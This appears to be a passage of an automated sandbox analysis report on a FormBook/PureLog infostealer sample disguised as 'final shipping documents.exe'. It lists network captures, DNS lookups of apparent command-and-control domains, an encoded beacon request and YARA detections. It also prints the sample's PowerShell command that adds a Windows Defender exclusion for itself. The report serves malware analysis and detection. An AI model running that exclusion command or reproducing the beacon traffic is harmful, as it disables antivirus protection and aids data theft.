Jan 14, 2025 16:37:59.336646080 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.336677074 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.336703062 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.339704990 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.350058079 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.353753090 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.372107983 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.429948092 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.432132959 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.435705900 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.435734034 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.435758114 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.435780048 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.440470934 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.441896915 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.445413113 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.464790106 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.464821100 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.464864969 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.470830917 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.473308086 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.478224993 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.534110069 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.536947012 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.539066076 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.539118052 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.539124966 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.539170980 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.542746067 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.544986010 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.547597885 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.569638014 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.569693089 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.569744110 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.573386908 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.574923038 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.579824924 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.636154890 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.640964985 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.640985012 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.641005993 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.641017914 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.641056061 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.649071932 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.650520086 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.655373096 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.656547070 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.671757936 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.671778917 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.671834946 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.689729929 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.691093922 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.696072102 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.747613907 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.747628927 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.747705936 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.751692057 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.752471924 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.757234097 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.760121107 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.761971951 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.788563967 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.788656950 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.788702965 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.793030024 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.794174910 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.798989058 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.850083113 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.850105047 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.850152969 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.873420000 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.873593092 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.877000093 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.878698111 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.879040003 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.891658068 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.891695976 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.891752005 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.893723965 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.893883944 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.898848057 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.972444057 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.974787951 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.975672007 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.975709915 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.975716114 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.975912094 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.978529930 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.979446888 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.983326912 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.990833044 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.990844965 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.990900040 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.993542910 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.994278908 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.999440908 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.071890116 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.077433109 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.077446938 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.077505112 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.086746931 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.088124990 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.088849068 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.091892004 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.091912031 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.091964960 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.091988087 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.093687057 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.095621109 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.096432924 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.101196051 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.183332920 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.186178923 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.186192036 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.186248064 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.191747904 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.191762924 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.191819906 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.194281101 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.194303989 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.194314957 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.194351912 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.194376945 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.251210928 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.252120972 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.253144979 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.253936052 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.256934881 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.258770943 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.262767076 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.308043003 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.347393036 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.347429991 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.347443104 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.347479105 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.350169897 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.350187063 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.350266933 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.351358891 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.354768991 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.373099089 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.373114109 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.373168945 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.398155928 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.400279999 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.405174017 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.435853004 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.452824116 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.468761921 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.468781948 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.468837976 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.475898981 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.475987911 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.480798006 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.501526117 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.501543045 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.501588106 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.534013033 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.557080984 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.574453115 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.574472904 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.574562073 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:00.662622929 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:38:00.708532095 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:38:03.927344084 CET	49677	443	192.168.2.7	20.50.201.200
Jan 14, 2025 16:38:04.817923069 CET	49674	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:38:04.817943096 CET	49675	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:38:05.255409956 CET	49672	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:38:07.331711054 CET	443	49698	104.98.116.138	192.168.2.7
Jan 14, 2025 16:38:07.331811905 CET	49698	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:38:15.774709940 CET	49698	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:38:15.776864052 CET	49706	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:38:15.776907921 CET	443	49706	104.98.116.138	192.168.2.7
Jan 14, 2025 16:38:15.777085066 CET	49706	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:38:15.777664900 CET	49706	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:38:15.777713060 CET	443	49706	104.98.116.138	192.168.2.7
Jan 14, 2025 16:38:15.779493093 CET	443	49698	104.98.116.138	192.168.2.7
Jan 14, 2025 16:38:39.671770096 CET	49709	80	192.168.2.7	185.199.108.153
Jan 14, 2025 16:38:39.676609993 CET	80	49709	185.199.108.153	192.168.2.7
Jan 14, 2025 16:38:39.676706076 CET	49709	80	192.168.2.7	185.199.108.153
Jan 14, 2025 16:38:39.676743031 CET	49709	80	192.168.2.7	185.199.108.153
Jan 14, 2025 16:38:39.681534052 CET	80	49709	185.199.108.153	192.168.2.7
Jan 14, 2025 16:38:40.159646034 CET	80	49709	185.199.108.153	192.168.2.7
Jan 14, 2025 16:38:40.159682035 CET	80	49709	185.199.108.153	192.168.2.7
Jan 14, 2025 16:38:40.159734964 CET	80	49709	185.199.108.153	192.168.2.7
Jan 14, 2025 16:38:40.159751892 CET	80	49709	185.199.108.153	192.168.2.7
Jan 14, 2025 16:38:40.159766912 CET	80	49709	185.199.108.153	192.168.2.7
Jan 14, 2025 16:38:40.159781933 CET	80	49709	185.199.108.153	192.168.2.7
Jan 14, 2025 16:38:40.159852982 CET	49709	80	192.168.2.7	185.199.108.153
Jan 14, 2025 16:38:40.159871101 CET	80	49709	185.199.108.153	192.168.2.7
Jan 14, 2025 16:38:40.159904003 CET	49709	80	192.168.2.7	185.199.108.153
Jan 14, 2025 16:38:40.159924984 CET	49709	80	192.168.2.7	185.199.108.153
Jan 14, 2025 16:38:40.159985065 CET	49709	80	192.168.2.7	185.199.108.153
Jan 14, 2025 16:38:58.500181913 CET	443	49706	104.98.116.138	192.168.2.7
Jan 14, 2025 16:38:58.500257969 CET	49706	443	192.168.2.7	104.98.116.138
Jan 14, 2025 16:39:30.706473112 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:39:30.706638098 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:39:30.706688881 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:39:30.706747055 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:39:30.706792116 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:39:30.737375975 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:39:30.743305922 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:39:40.146662951 CET	49706	443	192.168.2.7	104.98.116.138

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 16:38:39.225651026 CET	58810	53	192.168.2.7	1.1.1.1
Jan 14, 2025 16:38:39.671075106 CET	53	58810	1.1.1.1	192.168.2.7
Jan 14, 2025 16:39:20.423031092 CET	54890	53	192.168.2.7	1.1.1.1
Jan 14, 2025 16:39:20.439357996 CET	53	54890	1.1.1.1	192.168.2.7
Jan 14, 2025 16:39:48.505202055 CET	52651	53	192.168.2.7	1.1.1.1
Jan 14, 2025 16:39:52.356586933 CET	61853	53	192.168.2.7	1.1.1.1
Jan 14, 2025 16:39:52.365798950 CET	53	61853	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 16:38:39.225651026 CET	192.168.2.7	1.1.1.1	0xcb78	Standard query (0)	www.haoyun.website	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:39:20.423031092 CET	192.168.2.7	1.1.1.1	0xe08d	Standard query (0)	www.mmarketing.xyz	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:39:48.505202055 CET	192.168.2.7	1.1.1.1	0xb253	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:39:52.356586933 CET	192.168.2.7	1.1.1.1	0x167a	Standard query (0)	www.avid-hildebrand.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 16:38:16.203033924 CET	1.1.1.1	192.168.2.7	0x85cb	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:38:16.203033924 CET	1.1.1.1	192.168.2.7	0x85cb	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:38:30.888173103 CET	1.1.1.1	192.168.2.7	0xbba5	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:38:30.888173103 CET	1.1.1.1	192.168.2.7	0xbba5	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:38:39.671075106 CET	1.1.1.1	192.168.2.7	0xcb78	No error (0)	www.haoyun.website	haoyunforever.github.io		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 16:38:39.671075106 CET	1.1.1.1	192.168.2.7	0xcb78	No error (0)	haoyunforever.github.io		185.199.108.153	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:38:39.671075106 CET	1.1.1.1	192.168.2.7	0xcb78	No error (0)	haoyunforever.github.io		185.199.109.153	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:38:39.671075106 CET	1.1.1.1	192.168.2.7	0xcb78	No error (0)	haoyunforever.github.io		185.199.110.153	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:38:39.671075106 CET	1.1.1.1	192.168.2.7	0xcb78	No error (0)	haoyunforever.github.io		185.199.111.153	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:39:20.439357996 CET	1.1.1.1	192.168.2.7	0xe08d	Name error (3)	www.mmarketing.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:39:48.512028933 CET	1.1.1.1	192.168.2.7	0xb253	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 16:39:52.365798950 CET	1.1.1.1	192.168.2.7	0x167a	Name error (3)	www.avid-hildebrand.info	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.haoyun.website

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49709	185.199.108.153	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 16:38:39.676743031 CET	182	OUT	GET /a03d/?GVCX=7n-XjdYXVLzpCFJP&kr40vv8=M9yuS0Q/zm5t8U3StSAeK3d/0GWzO6hCIAE2yJAL2S9lxfaLnLN+cxCn4w5s49jkAk0rpllKuQ== HTTP/1.1 Host: www.haoyun.website Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 14, 2025 16:38:40.159646034 CET	543	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 4248 Server: GitHub.com Content-Type: text/html; charset=utf-8 Access-Control-Allow-Origin: * ETag: "66974bb1-1098" x-proxy-cache: MISS X-GitHub-Request-Id: ED69:32EBA6:FDF93E:11ACEE1:67867976 Accept-Ranges: bytes Age: 2954 Date: Tue, 14 Jan 2025 15:38:40 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740031-EWR X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1736869120.114303,VS0,VE1 Vary: Accept-Encoding X-Fastly-Request-ID: 3bbfb139f28e179dc9aea2674997ca6044c1fd13
Jan 14, 2025 16:38:40.159682035 CET	1236	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <title>404</title> <meta name="keywords" content="Hexo,Ayer,404,Design" /> <meta name="description" content="hexo theme ayer page 404." /> <meta name=
Jan 14, 2025 16:38:40.159734964 CET	1236	IN	Data Raw: 5a 61 5a 59 6c 53 57 6d 55 56 6a 65 4b 79 6a 41 46 6e 58 33 32 47 54 52 53 49 61 49 53 4d 71 56 49 72 30 67 50 2b 58 35 6e 7a 6f 70 39 6e 58 4d 35 38 33 2f 6d 33 4a 6d 72 33 48 48 44 76 4d 78 5a 2b 31 74 72 66 57 66 2f 72 4c 33 32 4f 6f 51 4f 62 Data Ascii: ZaZYlSWmUVjeKyjAFnX32GTRSIaISMqVIr0gP+X5nzop9nXM583/m3Jmr3HHDvMxZ+1trfWf/rL32OoQOb9Th/uMyAZdHwBAyMGPatPH5ZHK8wzwOROMB2J9tJ8F80ic6lcznTx48dOjkUJnV1inQLcRNBaJZBMxkYFaTTn1HRHsKzJ4x5niTfSOLt5wApdQt8P1FALoB3BDZknqCRMfA7MFxdmqtf24JZhGkZQRIKSc6wDIAjw
Jan 14, 2025 16:38:40.159751892 CET	448	IN	Data Raw: 43 30 57 38 68 75 54 58 61 6d 50 44 69 32 50 2b 6f 4b 67 46 4b 79 6d 38 42 32 49 51 45 37 4a 6e 65 4e 57 5a 32 49 34 55 31 33 34 51 51 4b 30 46 6b 64 35 4e 77 71 32 70 4d 58 42 32 31 2b 71 57 6c 50 45 62 41 72 55 56 48 39 32 65 72 2b 46 47 4c 41 Data Ascii: C0W8huTXamPDi2P+oKgFKym8B2IQE7JneNWZ2I4U134QQK0Fkd5Nwq2pMXB21+qWlPEbArUVH92er+FGLAB4AZX5Ue977cYxTQjwOotI5zrxce947cfCa7WMXXAD29NrftDEV/lb8YVPXfjI5sDKT70/J5nLHmlYuxCMgKlk3mGip67ofNIsVVz6dTncR86Ggv5PPTyhPuVcQIKWc5QADKaYC8+hqObx6RikhHgZRuaOL4mZt4h
Jan 14, 2025 16:38:40.159766912 CET	1236	IN	Data Raw: 46 4d 6c 4b 65 34 51 73 33 54 37 5a 46 6d 41 4c 44 61 42 47 30 48 69 73 70 36 38 59 30 77 33 6f 62 46 45 4a 63 6c 53 44 71 62 57 6f 62 48 45 36 42 55 43 61 56 6d 73 79 4f 4d 35 41 59 6a 52 51 49 52 52 6b 32 55 56 62 66 66 70 79 4c 48 41 71 6e 68 Data Ascii: FMlKe4Qs3T7ZFmALDaBG0Hisp68Y0w3obFEJclSDqbWobHE6BUCaVmsyOM5AYjRQIRRk2UVbffpyLHAqnhVhORG8H9kYKhYsEDIvDkJLS3g2IYkwT/TA0HI7DqVRqXNJxwqU20Y/DwyEhkhZiFRG9GQz/phIi/dOgk1NixXWgJCXeeUnRC8VOnZsWrzYK7CmxYy5GLAHVrsbgOJl25PKjxhb15LpTqXEFx3FbdjVmlVVcjgItuS
Jan 14, 2025 16:38:40.159781933 CET	92	IN	Data Raw: 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 53 68 65 6e 2d 59 75 2f 63 64 6e 2f 69 6d 67 2f 34 30 34 2e 6a 70 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 66 69 67 75 72 65 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 62 6f 64 79 Data Ascii: dn.jsdelivr.net/gh/Shen-Yu/cdn/img/404.jpg" /> </figure> </div> </body></html>

Target ID:	0
Start time:	10:37:58
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\final shipping documents.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\final shipping documents.exe"
Imagebase:	0x880000
File size:	680'448 bytes
MD5 hash:	AD5806FFE238EA11606D3EE49B28C655
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1508959820.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1504736152.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:37:59
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
